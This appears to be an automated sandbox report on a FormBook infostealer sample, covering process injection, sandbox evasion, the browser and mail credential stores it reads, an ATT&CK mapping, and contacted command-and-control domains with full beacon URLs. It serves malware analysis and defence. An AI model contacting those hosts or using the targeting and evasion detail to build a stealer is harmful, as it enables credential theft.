                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0056D27A GetUserNameW,0_2_0056D27A
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0054B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0054B952
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                Source: 4sfN3Gx1vO.exe, 00000000.00000003.2058384684.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2086984348.0000000001605000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058889356.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2057850030.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2061991495.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058146418.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000002.2087777938.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058721100.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2074661232.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058613766.000000000160C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 4sfN3Gx1vO.exeBinary or memory string: WIN_81
                Source: 4sfN3Gx1vO.exeBinary or memory string: WIN_XP
                Source: 4sfN3Gx1vO.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: 4sfN3Gx1vO.exeBinary or memory string: WIN_XPe
                Source: 4sfN3Gx1vO.exeBinary or memory string: WIN_VISTA
                Source: 4sfN3Gx1vO.exeBinary or memory string: WIN_7
                Source: 4sfN3Gx1vO.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00591204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00591204
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00591806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00591806
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets351
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials12
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587791 Sample: 4sfN3Gx1vO.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.030002513.xyz 2->28 30 www.vilakodsiy.sbs 2->30 32 4 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 4sfN3Gx1vO.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->66 68 3 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 YZKoIsKkwLJWPq.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 prevhost.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 YZKoIsKkwLJWPq.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 mbakjisoo.site 172.96.187.60, 49979, 49980, 49981 SINGLEHOP-LLCUS Canada 22->34 36 187370.github.io 185.199.108.153, 49983, 49984, 49985 FASTLYUS Netherlands 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                4sfN3Gx1vO.exe72%VirustotalBrowse
                4sfN3Gx1vO.exe76%ReversingLabsWin32.Trojan.AutoitInject
                4sfN3Gx1vO.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.vilakodsiy.sbs0%Avira URL Cloudsafe
                http://www.pku-cs-cjw.top/o8v1/0%Avira URL Cloudsafe
                http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee0%Avira URL Cloudsafe
                http://www.vilakodsiy.sbs/w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn0%Avira URL Cloudsafe
                http://www.vilakodsiy.sbs/w7eo/0%Avira URL Cloudsafe
                http://www.030002513.xyz/95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug==0%Avira URL Cloudsafe
                http://www.mbakjisoo.site/s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn0%Avira URL Cloudsafe
                http://www.pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn0%Avira URL Cloudsafe
                http://www.mbakjisoo.site/s7cs/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.030002513.xyz
                161.97.142.144
                truetrue
                  unknown
                  www.vilakodsiy.sbs
                  104.21.64.1
                  truetrue
                    unknown
                    187370.github.io
                    185.199.108.153
                    truetrue
                      unknown
                      mbakjisoo.site
                      172.96.187.60
                      truetrue
                        unknown
                        www.mbakjisoo.site
                        unknown
                        unknownfalse
                          unknown
                          www.pku-cs-cjw.top
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://www.vilakodsiy.sbs/w7eo/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.mbakjisoo.site/s7cs/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.030002513.xyz/95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug==true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.mbakjisoo.site/s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVntrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVntrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.vilakodsiy.sbs/w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVntrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.pku-cs-cjw.top/o8v1/true
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabprevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoprevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72ageeprevhost.exe, 00000005.00000002.3316055880.0000000005DE8000.00000004.10000000.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.0000000003AB8000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchprevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.vilakodsiy.sbsYZKoIsKkwLJWPq.exe, 00000006.00000002.3317083963.000000000583E000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              161.97.142.144
                                              www.030002513.xyzUnited States
                                              51167CONTABODEtrue
                                              172.96.187.60
                                              mbakjisoo.siteCanada
                                              32475SINGLEHOP-LLCUStrue
                                              104.21.64.1
                                              www.vilakodsiy.sbsUnited States
                                              13335CLOUDFLARENETUStrue
                                              185.199.108.153
                                              187370.github.ioNetherlands
                                              54113FASTLYUStrue
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1587791
                                              Start date and time:2025-01-10 18:02:46 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 34s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:7
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:4sfN3Gx1vO.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/5@4/4
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 56
                                              • Number of non-executed functions: 287
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              TimeTypeDescription
                                              12:04:48API Interceptor1794103x Sleep call for process: prevhost.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              161.97.142.144SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.030002059.xyz/er88/
                                              RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.030002350.xyz/1a7n/
                                              SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.070001813.xyz/gn0y/
                                              PO2412010.exeGet hashmaliciousFormBookBrowse
                                              • www.070002018.xyz/6m2n/
                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                              • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                              Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.070002018.xyz/6m2n/
                                              Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                              • www.030002613.xyz/xd9h/
                                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.030002449.xyz/cfqm/
                                              PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                              • www.070001955.xyz/7zj0/
                                              W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.54248711.xyz/jm2l/
                                              172.96.187.60r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/s20z/
                                              PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/v2c3/
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/v2c3/
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/v2c3/
                                              xU0wdBC6XWRZ6UY.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==
                                              104.21.64.11162-201.exeGet hashmaliciousFormBookBrowse
                                              • www.mzkd6gp5.top/utww/
                                              QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                              • www.mzkd6gp5.top/3u0p/
                                              Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                              • ordrr.statementquo.com/QCbxA/
                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                              • adsfirm.com/administrator/index.php
                                              PO2412010.exeGet hashmaliciousFormBookBrowse
                                              • www.bser101pp.buzz/v89f/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              187370.github.ioDHL.exeGet hashmaliciousFormBookBrowse
                                              • 185.199.110.153
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SINGLEHOP-LLCUShttp://atozpdfbooks.comGet hashmaliciousUnknownBrowse
                                              • 108.178.23.115
                                              https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb2NhbCZoPUE1Z0FJY1RpY2tXbGRHJTJidFFwJTJmY0dnQ3Z3Tmg4UmZjRXBwQmdUTGlNOEtNJTNkJnA9bHdfdHAmaWc9QTlFRTIyOTNCQzJGNDgyMDlGMTkyNEFBOUQ4MTUyNkYmeXBpZD1ZTjg3M3gxNzg2NjcxMDE2NTE1NDQyOTA3NA&ntb=1Get hashmaliciousUnknownBrowse
                                              • 67.212.173.75
                                              Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                              • 65.62.59.148
                                              XL-1-6-25-(EXCEL LATEST 2025).htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 109.199.112.156
                                              miori.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 65.63.38.172
                                              AZfDGVWF68.pdfGet hashmaliciousUnknownBrowse
                                              • 67.212.184.148
                                              Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                              • 173.236.124.78
                                              Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                              • 65.62.12.161
                                              botx.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 65.63.172.135
                                              db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 199.26.214.9
                                              CONTABODE82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                              • 144.91.79.54
                                              DF2.exeGet hashmaliciousUnknownBrowse
                                              • 173.249.2.110
                                              Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                              • 173.249.11.35
                                              bot.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 95.212.118.93
                                              bot.mips.elfGet hashmaliciousMiraiBrowse
                                              • 95.212.118.77
                                              SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 161.97.142.144
                                              payload-c17f7df6-cf80-43d5-8c60-eca90366debb.exeGet hashmaliciousMetasploitBrowse
                                              • 178.238.231.204
                                              RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 161.97.142.144
                                              ORDER-401.exeGet hashmaliciousFormBookBrowse
                                              • 161.97.142.144
                                              SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                              • 161.97.142.144
                                              CLOUDFLARENETUSsmQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                              • 104.16.79.73
                                              qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.80.1
                                              44742054371077666.jsGet hashmaliciousStrela DownloaderBrowse
                                              • 172.64.41.3
                                              http://atozpdfbooks.comGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              http://infarmbureau.comGet hashmaliciousUnknownBrowse
                                              • 104.16.40.28
                                              r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.80.1
                                              RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 104.21.80.1
                                              zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.21.112.1
                                              MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.21.112.1
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\prevhost.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.121297215059106
                                              Encrypted:false
                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
